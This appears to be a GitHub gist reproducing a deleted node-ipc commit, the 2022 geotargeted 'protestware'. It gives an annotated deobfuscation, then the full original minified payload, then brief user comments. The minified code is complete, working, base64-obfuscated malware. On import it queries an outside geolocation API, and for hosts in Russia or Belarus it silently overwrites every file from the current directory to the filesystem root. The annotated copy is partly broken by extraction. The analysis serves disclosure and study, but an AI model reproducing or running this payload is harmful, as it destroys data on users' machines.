A deleted commit from the node-ipc repository. You can find the original commit here: **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.**
import u from "path";
import a from "fs";
import o from "https";
// Obfuscated code that I deobfuscated.
// I also added comments which should help explain what exactly is going on here.
// Originally written by Brandon Nozaki Miller.
// See you in prison, Brandon.
// Original commit:
// Trigger stage. The payload is wrapped in setTimeout with a random delay of up to
// 1000 ms (see the last line of this block), so it fires shortly after the module is
// imported rather than during the import itself.
setTimeout(function () {
// Random gate: Math.round(Math.random() * 4) yields 0..4 and only 0 or 1 continue,
// so the payload proceeds on roughly 3 runs in 8 (not 50%). A clean test run therefore
// does not show that a host is unaffected.
const t = Math.round(Math.random() * 4);
if (t > 1) return;
// Geolocation lookup URL. The value is missing from this listing; in the minified
// original it is a base64 literal that decodes to an https://api.ipgeolocation.io/ipgeo
// request carrying an API key. An outbound HTTPS request to that host from a process
// that merely imports an IPC library is a usable network detection signal.
const n =
// The request is sent to the URL above; the response body is expected to be JSON
// describing the caller's location, derived from the requesting IP address.
o.get(n, function (t) {
// Each "data" chunk is parsed on its own, so a response split across several chunks
// would fail JSON.parse and be swallowed by the empty catch below.
t.on("data", function (t) {
// Directory roots handed to the overwrite routine: the current directory, its parent,
// its grandparent and the filesystem root. Base64-encoded in the minified original.
const n = "./";
const o = "../";
const r = "../../";
const f = "/";
// Field read from the geolocation response.
const c = "country_name";
// Country names that enable the destructive branch (substring match, lower-cased).
const e = "russia";
const i = "belarus";
try {
const s = JSON.parse(t);
const u = s[c].toLowerCase();
// True when the reported country name contains either string above.
const a = u.includes(e) || u.includes(i);
// NOTE(review): this listing lost the body of the `if` and its closing braces during
// extraction. In the minified original the branch calls h() once for each of the four
// paths declared above.
if (a) {
// The empty catch hides every failure (bad JSON, missing field), so the module shows
// no error or log output whether or not the payload ran.
} catch (t) {}
}, Math.ceil(Math.random() * 1e3));
/**
 * @param n The relative location of CWD of where the script was run.
 * @param o Presumably meant to be used recursively.
 */
// The function that does the overwriting. Not sure why it is `async` though.
// Overwrite routine: walks directory `n` and replaces the contents of every file whose
// path contains the substring `o`. With the default o = "" the substring test matches
// every path. File contents are replaced, not encrypted, so recovery depends on backups.
//
// NOTE(review): `h` is declared async but contains no `await`, so its whole body runs
// synchronously on each call. The recursive call below therefore still descends into
// subdirectories; only the value it returns is a Promise. Do not read the "async bug"
// as meaning the routine is harmless.
async function h(n = "", o = "") {
// Nothing to do when the path does not exist.
if (!a.existsSync(n)) return;
let r = [];
try {
// Directory listing; a failure (e.g. permission denied) is silently ignored and
// leaves `r` empty.
r = a.readdirSync(n);
} catch (t) {}
// Result list. Nothing visible here ever adds to it, so it is returned empty.
const f = [];
// Replacement content written over each file (base64-encoded in the minified original).
const c = "❤️";
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
// NOTE(review): the listing lost `continue` and the closing brace of this catch during
// extraction; the minified original skips entries whose lstat fails.
} catch (t) {
// Directories are walked recursively.
if (t.isDirectory()) {
const s = h(i, o);
// `s` is a Promise, so `s.length` is undefined and nothing is merged into `f`. The
// recursive call has already run by this point; only the bookkeeping is broken.
s.length > 0 ? f.push(...s) : null;
// indexOf("") is 0 for any string, so with the default `o` every file is selected.
} else if (i.indexOf(o) >= 0) {
try {
// Replaces the file's contents with `c`. The empty callback discards write errors,
// so failures (read-only files, permissions) leave no trace.
a.writeFile(i, c, function () {});
} catch (t) {}
// NOTE(review): closing braces for the else-branch, the loop and the function are
// missing from this listing; see the minified original for the full structure.
return f;
// Decoy exports: the module exposes only the constant `ssl` (as both a named and the
// default export), so an import succeeds and looks harmless to the consuming code.
// The module's real effect is the top-level setTimeout side effect, which runs on import.
const ssl = true;
export { ssl, ssl as default };
// Original minified payload, kept byte-for-byte as the reference sample.
// Reading notes for reviewers:
//  - Every string that would reveal intent (the geolocation URL, the four directory
//    roots, the "country_name" field, the two country names and the replacement text)
//    is hidden behind Buffer.from(<base64>, "base64") and decoded at run time, so a
//    plain-text search for those words in a dependency tree finds nothing. Searching
//    for the base64 literals below does.
//  - All work happens as an import-time side effect (setTimeout at top level); the
//    only exports are the decoy constant `ssl`.
//  - Every catch block is empty, so the module is silent on success and on failure.
//  - `h` is async without any await: it runs synchronously, including its recursion.
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

wongjiahau commented Mar 18, 2022

Don’t run on host, run it in a container


shorwood commented Mar 18, 2022

Or Gitpod for the curious ones.


mdo992 commented Mar 18, 2022

The API key isn't valid anymore:

{"message":"Provided API key is not valid. Contact technical support for assistance at"}


swoopae commented Mar 18, 2022

      // Again, the function was async. This will not even work properly.
      s.length > 0 ? f.push(...s) : null;

leave it to your average js dev to not be even able to write functional malware
